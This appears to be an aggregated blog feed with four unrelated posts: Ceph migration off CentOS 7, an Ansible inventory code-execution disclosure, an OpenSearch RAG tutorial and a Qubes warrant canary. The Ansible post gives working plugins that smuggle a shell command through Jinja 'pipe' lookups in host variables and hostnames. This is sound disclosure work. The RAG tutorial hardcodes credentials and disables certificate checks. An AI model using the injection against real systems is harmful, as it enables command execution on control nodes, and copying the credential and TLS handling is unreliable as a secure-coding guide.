Back in 2020, the CentOS Project announced that they would focus only on CentOS Stream, meaning that CentOS 7 would be the last release with commonality to Red Hat Enterprise Linux. The End of Life (EOL) of CentOS 7 on June 30, 2024, means that there will no longer be security updates, patches or new features released for the OS.
If a user deployed Ceph on this version of CentOS, their future path is challenging. There are several options to work around the challenge of this EOL, but each comes with its own nuance:
If the user does nothing, their ageing deployments will eventually have no supported path to upgrade to future versions of Ceph, leaving them behind in terms of new features and functionality. Even worse, that user will have no options for security patches for critical security bugs.
Migrating to Red Hat Enterprise Linux certainly gives a supported approach, with future updates and upgrades available, but at the cost of potentially expensive enterprise licensing for both the OS and Ceph.
Several other Linux distributions have suggested that they will be able to keep binary compatibility with upstream RHEL, but without a legal or contractual agreement this is a risky approach.
One of the most common reasons for using CentOS was in non-production test and dev systems, where compatibility was assured with RHEL but there was no licence required. So that potentially means yet more additional cost to enrol those systems in support as well.
There’s a fifth option the user could take: one that eliminates their exposure to EOL, guarantees them long-term support for their OS and application, and which cuts out the need for expensive additional licensing.
We’re talking of course about moving to another open source operating system that operates licence-free. Ubuntu Linux is hands-down the go-to OS for these requirements: it has zero licensing requirements to use, and allows you to use Ceph without a licence.
Ubuntu also prevents lock-in. For production environments support can be purchased, providing up to 24/7 telephone and ticket support. A single straightforward subscription covers not only the base OS, but also Ceph (and other applications running on the same node(s)), with flexibility that accommodates users who feel that they do not need support in the future.
Migrating data has always been a complex and time-consuming process, and depending on the scenario there are multiple ways to approach it. A user can copy their data between two storage systems via their host servers.
Or, with the help of professional services, an existing Ceph cluster can be converted from one operating system to another. One approach is an in-place migration, where the data remains on the same disks and just the OS and Ceph software are replaced around them. If deeper conversion work is required (e.g. filestore to bluestore), OSD nodes can instead be rotated out of the existing cluster, reconfigured, and re-added, eventually replacing the entire existing installation.
These approaches can save a lot of administrative overhead; however, each migration is bespoke. Contact us to find out more.
Find out more about Ceph here.
I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.
Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.
Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.
For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.
And this is where things are getting interesting.
Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host.
And if that comment contains a Jinja expression, it might get executed.
And if that Jinja expression is using the pipe lookup, it might get executed in your shell.
Let that sink in for a moment, and then we'll look at an example.
from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

1. It defines an inventory plugin named evgeni.inventoryrce.inventory.
2. It accepts any configuration file whose name ends in evgeni.yml (we'll need that to trigger the use of this inventory later).
3. It adds a host exploit.example.com with the local connection type and a something_funny variable to the inventory.

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.
The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.
Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).
And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.
If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)
So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.
To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.
Or a debug task where you dump all variables of a host to analyze what's set.
Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug.
No mention of our funny variable.
Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]

TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
        …
        "something_funny": ""
    }
}

PLAY RECAP *************************************************************************************************
exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything.
But it did create the file!
% ls -alh /tmp/hacked
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….
This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.
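The underlying mechanic can be reproduced outside of Ansible with plain Jinja2. A minimal sketch (note that vanilla Jinja2 keeps values passed in as variables inert; Ansible's templating layer additionally re-templates variable values, which is exactly what makes untrusted inventory data dangerous):

```python
from jinja2 import Template

# Stand-in for an attacker-controlled inventory variable.
untrusted = '{{ 7 * 6 }}'

# If the untrusted string becomes the *template source*, the expression runs:
print(Template(untrusted).render())             # -> 42

# Vanilla Jinja2 treats values passed as variables as plain data:
print(Template('{{ v }}').render(v=untrusted))  # -> {{ 7 * 6 }}
```

Ansible, by contrast, feeds rendered values through the engine again unless they are marked unsafe, so the expression hidden in the variable ends up being evaluated after all.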
In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var

…

self.inventory.set_variable('exploit.example.com', 'something_funny',
                            wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)

for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)

for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
And honestly, I can totally understand that.
When developing an inventory, you do not expect to handle insecure input data.
You also expect the API to handle the data in a secure way by default.
But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily, and data in Ansible defaults to "safe".
It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481
But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0

% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.
11 March, 2024 08:31AM by aida
Large Language Models (LLMs) fall under the category of Generative AI (GenAI), an artificial intelligence type that produces content based on user-defined context. These models undergo training using an extensive dataset composed of trillions of combinations of words from natural language, enabling them to empower interactive and conversational applications across various scenarios.
Renowned LLMs like GPT, BERT, PaLM, and LLaMa can experience performance improvements by gaining access to additional structured and unstructured data. This additional data may include public or internal documents, websites, and various text forms and content. This methodology, termed retrieval-augmented generation (RAG), ensures that your conversational application generates accurate results with contextual relevance and domain-specific knowledge, even in areas where the pertinent facts were not part of the initial training dataset.
RAG can drastically improve the accuracy of an LLM’s responses. See the example below:
Pro is a subscription-based service that offers additional features and functionality to users. For example, Pro users can access exclusive content, receive priority customer support, and more. To become a Pro user, you can sign up for a Pro subscription on our website. Once you have signed up, you can access all of the Pro features and benefits.
Ubuntu Pro is an additional stream of security updates and packages that meet compliance requirements, such as FIPS or HIPAA, on top of an Ubuntu LTS. It provides an SLA for security fixes for the entire distribution (‘main and universe’ packages) for ten years, with extensions for industrial use cases. Ubuntu Pro is free for personal use, offering the full suite of Ubuntu Pro capabilities on up to 5 machines.
This article guides you on leveraging Charmed OpenSearch to maintain a relevant and up-to-date LLM application.
OpenSearch is an open-source search and analytics engine. Users can extend the functionality of OpenSearch with a selection of plugins that enhance search, security, performance analysis, machine learning, and more. This previous article we wrote provides additional details on the comprehensive features of OpenSearch. We discussed the capability of enabling enterprise-grade solutions through Charmed OpenSearch. This blog will emphasise a specific feature pertinent to RAG: utilising OpenSearch as a vector database.
Vector databases allow you to store and index, for example, text documents, rich media, audio, geospatial coordinates, tables, and graphs into vectors. These vectors represent points in N-dimensional spaces, effectively encapsulating the context of an asset. Search tools can look into these spaces using low-latency queries to find similar assets in neighbouring data points. These search tools typically do this by exploiting the efficiency of different methods for obtaining, for example, the k-nearest neighbours (k-NN) from an index of vectors.
In particular, OpenSearch enables this feature with the k-NN plugin and augments this functionality by providing your conversational applications with other essential features, such as fault tolerance, resource access controls, and a powerful query engine.
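As a rough intuition for what a k-NN search computes, here is a minimal, self-contained sketch using toy 3-dimensional vectors and a brute-force scan. (This is an illustration only: real sentence embeddings have hundreds of dimensions, and production engines like OpenSearch's k-NN plugin use approximate index structures rather than scanning every vector.)

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

def knn(query, index, k=2):
    """Brute-force k-nearest-neighbour lookup over a dict of id -> vector."""
    ranked = sorted(index, key=lambda doc_id: cosine_similarity(query, index[doc_id]), reverse=True)
    return ranked[:k]

# Hypothetical toy "embeddings" for three documents.
index = {
    "doc-pro":   [0.9, 0.1, 0.0],
    "doc-ceph":  [0.0, 0.8, 0.6],
    "doc-other": [0.1, 0.0, 0.9],
}

print(knn([1.0, 0.2, 0.0], index, k=1))  # -> ['doc-pro']
```

The nearest neighbours of a query vector are the stored vectors pointing in the most similar direction, which is why semantically related text chunks end up close together.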
In this section, we provide a practical example of using Charmed OpenSearch as a retrieval tool in the RAG process, with an experiment using a Jupyter notebook on top of Charmed Kubeflow to query an LLM.
1. Deploy Charmed OpenSearch and enable the k-NN plugin. The Charmed OpenSearch tutorial is a good starting point. At the end, verify that the plugin is enabled (it is enabled by default):
$ juju config opensearch plugin_opensearch_knn
true
2. Get your credentials. The easiest way to create and retrieve your first administrator credentials is to add a relation between Charmed OpenSearch and the Data Integrator charm, which is also part of the tutorial.
3. Create a vector index for k-NN search. Now we can create a vector index for your additional documents, encoded using the knn_vector data type. For simplicity, we will use the opensearch-py client.
from opensearchpy import OpenSearch
os_host = "10.56.118.209"
os_port = 9200
os_url = "https://10.56.118.209:9200"
os_auth = ("opensearch-client_7","sqlKjlEK7ldsBxqsOHNcFoSXayDudf30")
os_client = OpenSearch(
hosts = [{'host': os_host, 'port': os_port}],
http_compress = True,
http_auth = os_auth,
use_ssl = True,
verify_certs = False,
ssl_assert_hostname = False,
ssl_show_warn = False
)
os_index_name = "rag-index"
settings = {
"settings": {
"index": {
"knn": True,
"knn.space_type": "cosinesimil"
}
}
}
os_client.indices.create(index=os_index_name, body=settings)
properties={
"properties": {
"vector_field": {
"type": "knn_vector",
"dimension": 384
},
"text": {
"type": "keyword"
}
}
}
os_client.indices.put_mapping(index=os_index_name, body=properties)
4. Aggregate source documents. In this example, we will select a list of web content that we want our application to use as relevant information to provide accurate answers:
content_links = [
    "https://discourse.ubuntu.com/t/ubuntu-pro-faq/34042"
]
5. Load document contents into memory and split the content into chunks. This will allow us to create embeddings from the selected documents and upload them to the index we created.
from langchain.document_loaders import WebBaseLoader
loader = WebBaseLoader(content_links)
htmls = loader.load()
from langchain.text_splitter import CharacterTextSplitter
text_splitter = CharacterTextSplitter(
chunk_size=500,
chunk_overlap=0,
separator="\n")
docs = text_splitter.split_documents(htmls)
6. Create embeddings for the text chunks and store them in the vector index we created.
from langchain.embeddings import HuggingFaceEmbeddings
embeddings = HuggingFaceEmbeddings(
model_name="sentence-transformers/all-MiniLM-L12-v2",
encode_kwargs={'normalize_embeddings': False})
from langchain.vectorstores import OpenSearchVectorSearch
docsearch = OpenSearchVectorSearch.from_documents(docs, embeddings,
ef_construction=256,
engine="faiss",
space_type="innerproduct",
m=48, opensearch_url=os_url,
index_name=os_index_name,
http_auth=os_auth,
verify_certs=False)
7. Use the similarity search to retrieve the documents that provide context to your query. The search engine will perform the Approximate k-NN Search, for example, using the cosine similarity formula, and return the relevant documents in the context of your question.
query = """
What is Pro?
"""
similar_docs = docsearch.similarity_search(query, k=2,
raw_response=True,
search_type="approximate_search",
space_type="cosinesimil")
8. Prepare your LLM. We use a simple example with a Hugging Face pipeline to load an LLM.
from transformers import AutoTokenizer, AutoModelForCausalLM, pipeline
from langchain.llms import HuggingFacePipeline
model_name="TheBloke/Llama-2-7B-Chat-GPTQ"
model = AutoModelForCausalLM.from_pretrained(
model_name,
cache_dir="model",
device_map='auto'
)
tokenizer = AutoTokenizer.from_pretrained(model_name,cache_dir="llm/tokenizer")
pl = pipeline(
"text-generation",
model=model,
tokenizer=tokenizer,
max_length = 2048
)
llm = HuggingFacePipeline(pipeline=pl)
9. Create a prompt template. It will define the expectations of the response and specify that we will provide context for an accurate answer.
from langchain import PromptTemplate
question_prompt_template = """
You are a friendly chatbot assistant that responds in a conversational manner to user's questions.
Respond in short but complete answers unless specifically asked by the user to elaborate on something.
Use History and Context to inform your answers.
Context:
---------
{context}
---------
Question: {question}
Helpful Answer:"""
QUESTION_PROMPT = PromptTemplate(
template=question_prompt_template, input_variables=["context", "question"]
)
10. Query the LLM to answer your question using the context documents retrieved from OpenSearch.
from langchain.chains.question_answering import load_qa_chain
question = "What is Pro?"
chain = load_qa_chain(llm, chain_type="stuff", prompt=QUESTION_PROMPT)
chain.run(input_documents=similar_docs, question=question)
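For intuition, the "stuff" chain type simply concatenates (stuffs) the retrieved document texts into the {context} slot of the prompt before making a single LLM call. A minimal pure-Python sketch of that idea (the helper function and sample texts here are illustrative stand-ins, not LangChain internals):

```python
QUESTION_PROMPT_TEMPLATE = """\
Context:
---------
{context}
---------
Question: {question}
Helpful Answer:"""

def stuff_prompt(doc_texts, question):
    """Join all retrieved document texts and 'stuff' them into one prompt."""
    context = "\n\n".join(doc_texts)
    return QUESTION_PROMPT_TEMPLATE.format(context=context, question=question)

prompt = stuff_prompt(
    ["Ubuntu Pro is a subscription for expanded security maintenance.",
     "Pro coverage extends to packages in the universe repository."],
    "What is Pro?",
)
print(prompt)
```

This is why the "stuff" strategy is sensitive to max_length: every retrieved document must fit into the model's context window alongside the question.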
Retrieval-augmented generation (RAG) is a method that enables users to converse with data repositories. It’s a tool that can revolutionise how you access and utilise data, as we showed in our tutorial. With RAG, you can improve data retrieval, enhance knowledge sharing, and enrich the results of your LLMs to give more contextually relevant, insightful responses that better reflect the most up-to-date information in your organisation.
The benefits of better LLMs that can access your knowledge base are as obvious as they are alluring: you gain better customer support, employee training and developer productivity. On top of that, you ensure that your teams get LLM answers and results that reflect accurate, up-to-date policy and information rather than generalised or even outright useless answers.
As we showed, Charmed OpenSearch is a simple and robust technology that can enable RAG capabilities. With it (and our helpful tutorial), any business can leverage RAG to transform their technical or policy manuals and logs into comprehensive knowledge bases.
Charmed OpenSearch is available for the open-source community. Canonical’s team of experts can help you get started with it as the vector database to leverage the power of the k-NN search for your LLM applications at any scale. Contact Canonical if you have questions.
Watch the webinar: Future-proof AI applications with OpenSearch as a vector database
We have published Qubes Canary 038. The text of this canary and its accompanying cryptographic signatures are reproduced below. For an explanation of this announcement and instructions for authenticating this canary, please see the end of this announcement.
---===[ Qubes Canary 038 ]===---
Statements
-----------
The Qubes security team members who have digitally signed this file [1]
state the following:
1. The date of issue of this canary is March 11, 2024.
2. There have been 100 Qubes security bulletins published so far.
3. The Qubes Master Signing Key fingerprint is:
427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
4. No warrants have ever been served to us with regard to the Qubes OS
Project (e.g. to hand out the private signing keys or to introduce
backdoors).
5. We plan to publish the next of these canary statements in the first
fourteen days of June 2024. Special note should be taken if no new
canary is published by that time or if the list of statements changes
without plausible explanation.
Special announcements
----------------------
None.
Disclaimers and notes
----------------------
We would like to remind you that Qubes OS has been designed under the
assumption that all relevant infrastructure is permanently compromised.
This means that we assume NO trust in any of the servers or services
which host or provide any Qubes-related data, in particular, software
updates, source code repositories, and Qubes ISO downloads.
This canary scheme is not infallible. Although signing the declaration
makes it very difficult for a third party to produce arbitrary
declarations, it does not prevent them from using force or other means,
like blackmail or compromising the signers' laptops, to coerce us to
produce false declarations.
The proof of freshness provided below serves to demonstrate that this
canary could not have been created prior to the date stated. It shows
that a series of canaries was not created in advance.
This declaration is merely a best effort and is provided without any
guarantee or warranty. It is not legally binding in any way to anybody.
None of the signers should be ever held legally responsible for any of
the statements made here.
Proof of freshness
-------------------
Mon, 11 Mar 2024 01:10:33 +0000
Source: DER SPIEGEL - International (https://www.spiegel.de/international/index.rss)
Jan Marsalek an Agent for Russia? The Double Life of the former Wirecard Executive
The Russian Invasion - A Visit to the Ukrainian Troops in the Trenches on the Front
The Marseille Experiment: Macron Attempts to Save a City Rocked by Drug Violence
How Vladimir Putin Controls the Russians: Everyday Repression and Resignation
A Visit to the Swamp: The Town Made Famous by Neo-Nazi Students
Source: NYT > World News (https://rss.nytimes.com/services/xml/rss/nyt/World.xml)
Israel Finds a Lifeline in the U.A.E. as Its Ties to Arab Countries Fray
Photo of Catherine, Prince of Wales, Manipulated, News Agencies Say
‘It’s a Way of Life’: Women Make Their Mark in the Ukrainian Army
China’s Growth Slows but Xi Jinping Keeps to His Vision
The Colombian Town That Gabriel García Márquez’s Legacy Helped Transform
Source: BBC News (https://feeds.bbci.co.uk/news/world/rss.xml)
Oscars 2024: Oppenheimer and Poor Things scoop early awards
Oscars red carpet fashion: Stars turn on the style
Ukraine criticises Pope's 'white flag' comment
Portugal vote too close to call as far right surges
Six skiers missing near Matterhorn in Swiss Alps
Source: Blockchain.info
000000000000000000007602e7b20b10a857d9222c78a375fe6334613dff2b60
Footnotes
----------
[1] This file should be signed in two ways: (1) via detached PGP
signatures by each of the signers, distributed together with this canary
in the qubes-secpack.git repo, and (2) via digital signatures on the
corresponding qubes-secpack.git repo tags. [2]
[2] Don't just trust the contents of this file blindly! Verify the
digital signatures! Instructions for doing so are documented here:
https://www.qubes-os.org/security/pack/
--
The Qubes Security Team
https://www.qubes-os.org/security/
Source: https://github.com/QubesOS/qubes-secpack/blob/main/canaries/canary-038-2024.txt
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEELRdx/k12ftx2sIn61lWk8hgw4GoFAmXuX3AACgkQ1lWk8hgw
4Goh5A//TkwqT8ryJY5ptnaQyrwx7MYC4NlfEe7OayOAxG+LFYQLmV+FOC471/bi
K1zZa4n5tJTGODuGNH/AwVwE02kmNpFSSgkL4KAGWk56OjpmhT27RS5DPYKz1URX
VMi+JD9Z84J4NfbPNtp39z7OoQaYI9GUwHnW45U5gfFduwzVlDvuy0LIjRTtO9Z3
6zWWqGZ1gdOBJZzOM2t8M9UE5suJzhyjBAavKq7yc4UGqHmV4T2AHUzFzCa9b8D1
z1Djo5QJondtcGH2XOZ50/8iEIKBysorjOqaXAjQPhWjxVlm/Bw/zSe5hLnTugcU
sto0wzdBOGWZR/NzC0+x2WxMH31IuRxl/YawrguEiH/Va3j+nsD9OM14kpxNBMc9
UMWhjiN3Qg4rJcH6b7HCd5oafeU/2iHS5XdwOJ/lX4P7B+eV02LFt5mUSPIYFYa6
aIjbyR+GKOveV4AHJgRYwecVA2BNw67Rtx6i9xOZBsQYzRklXJy9AUoqTDni5xlC
Z5/LnLcmxlpsEHgY/T+oMuMfg7TinL+18CTESWVsU+WuWsT4AWO14xVvcp/kWcL4
G9Diq2nMhKAZ+GiikW4vsfj2w8CC5jP2m2cIDSXFVlfFXR7hDgzo/+2R6+vcyMrc
jk8TJrKfkBIFW0NdYk9itFuXTNyq2LmuCw6sKTi2wENuXY6GfsI=
=tRmo
-----END PGP SIGNATURE-----
Source: https://github.com/QubesOS/qubes-secpack/blob/main/canaries/canary-038-2024.txt.sig.marmarek
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmXuW1AACgkQSsGN4REu
FJAdAQ/9GxwVG8dw0pdpxJFZpVnD0EdJXYiOMlt7iiC1W0g68Es95naXdKyfjjeZ
VS/RnSrFAGdTGuOFlFXJr/NJHexBYGd+/Z9+VxvPc0geINYDYpE0yoKLoVAp2UrJ
0gc5QEzkIgCgok+9ff3mYfpEGVAVnTJmUIHjagqyaYA3GDqR8i6hj1kMOBHVokcG
zvFdY3UV/RZGD043t0R8j+IwE8SnJUK+pOcbS2ucX0LA+crDbRjJhiJapGm4+MDP
KLLVjg76IsP2jbXoY/0Vvt4HQVHUSw3XVCYtRSVtM3bmpybzBcvWGSykT3D7L8aS
UnRkaqaDQX3UbbGXvL06prEipqW54e54lRbf/juBHLnQqntD6+gIltiyFWM9tdRX
XdAmcoTaZ00GrbN/+99VadF6/OGJu1TyLz6WmKLAdoGY/4C0wS5mSxufquHi1KFV
SJfuqbQZ8TD1QJ7PqPH9cfnf7vHaAW+CsM7yHLjdaCMLdHeXO28Bh5sq6j4l+J/M
vOa8y1WTrdyxdBmeYN5D0fSiMfq+eANiJuAuqIcQNPzf/kpI0V2DDpp7MQZnB03y
Ng/f2Mmo2DOxPq9HwwPTd7PcGjCdjGoE9Xajk0zTzNphEZT2QCDp7+Gkqnm91/KU
ZKeGM9LefgcfkjfcMYq9xIVfZz7uX3RHWSlFqS7KwYiCGJqI1A4=
=Mwb2
-----END PGP SIGNATURE-----
Source: https://github.com/QubesOS/qubes-secpack/blob/main/canaries/canary-038-2024.txt.sig.simon
The purpose of this announcement is to inform the Qubes community that a new Qubes canary has been published.
A Qubes canary is a security announcement periodically issued by the Qubes security team consisting of several statements to the effect that the signers of the canary have not been compromised. The idea is that, as long as signed canaries including such statements continue to be published, all is well. However, if the canaries should suddenly cease, if one or more signers begin declining to sign them, or if the included statements change significantly without plausible explanation, then this may indicate that something has gone wrong. A list of all canaries is available here.
The name originates from the practice in which miners would bring caged canaries into coal mines. If the level of methane gas in the mine reached a dangerous level, the canary would die, indicating to miners that they should evacuate. (See the Wikipedia article on warrant canaries for more information, but bear in mind that Qubes Canaries are not strictly limited to legal warrants.)
Canaries provide an important indication about the security status of the project. If the canary is healthy, it’s a strong sign that things are running normally. However, if the canary is unhealthy, it could mean that the project or its members are being coerced in some way.
That said, there are many canary-related possibilities that should not worry you.
In general, it would not be realistic for an organization to exist that never changed, had zero turnover, and never made mistakes. Therefore, it would be reasonable to expect such events to occur periodically, and it would be unreasonable to regard every unusual or unexpected canary-related event as a sign of compromise. For example, if something unusual happens with a canary, and we say it was a mistake and correct it, you will have to decide for yourself whether it’s more likely that it really was just a mistake or that something is wrong and that this is how we chose to send you a subtle signal about it. This will require you to think carefully about which among many possible scenarios is most likely given the evidence available to you. Since this is fundamentally a matter of judgment, canaries are ultimately a social scheme, not a technical one.
A PGP signature is a cryptographic digital signature made in accordance with the OpenPGP standard. PGP signatures can be cryptographically verified with programs like GNU Privacy Guard (GPG). The Qubes security team cryptographically signs all canaries so that Qubes users have a reliable way to check whether canaries are genuine. The only way to be certain that a canary is authentic is by verifying its PGP signatures.
If you fail to notice that a canary is unhealthy or has died, you may continue to trust the Qubes security team even after they have signaled via the canary (or lack thereof) that they have been compromised or coerced. Falsified canaries could include manipulated text designed to sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.
The following command-line instructions assume a Linux system with git and gpg installed. (For Windows and Mac options, see OpenPGP software.)
Obtain the Qubes Master Signing Key (QMSK), e.g.:
$ gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
(For more ways to obtain the QMSK, see How to import and authenticate the Qubes Master Signing Key.)
View the fingerprint of the PGP key you just imported. (Note: gpg> indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)
$ gpg --edit-key 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
gpg> fpr
pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
Important: At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you must authenticate the QMSK out-of-band. Do not skip this step! The standard method is to obtain the QMSK fingerprint from multiple independent sources in several different ways and check to see whether they match the key you just imported. For more information, see How to import and authenticate the Qubes Master Signing Key.
Tip: After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.
Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with q.
gpg> trust
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
gpg> q
Use Git to clone the qubes-secpack repo.
$ git clone https://github.com/QubesOS/qubes-secpack.git
Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
Import the included PGP keys. (See our PGP key policies for important information about these keys.)
$ gpg --import qubes-secpack/keys/*/*
gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
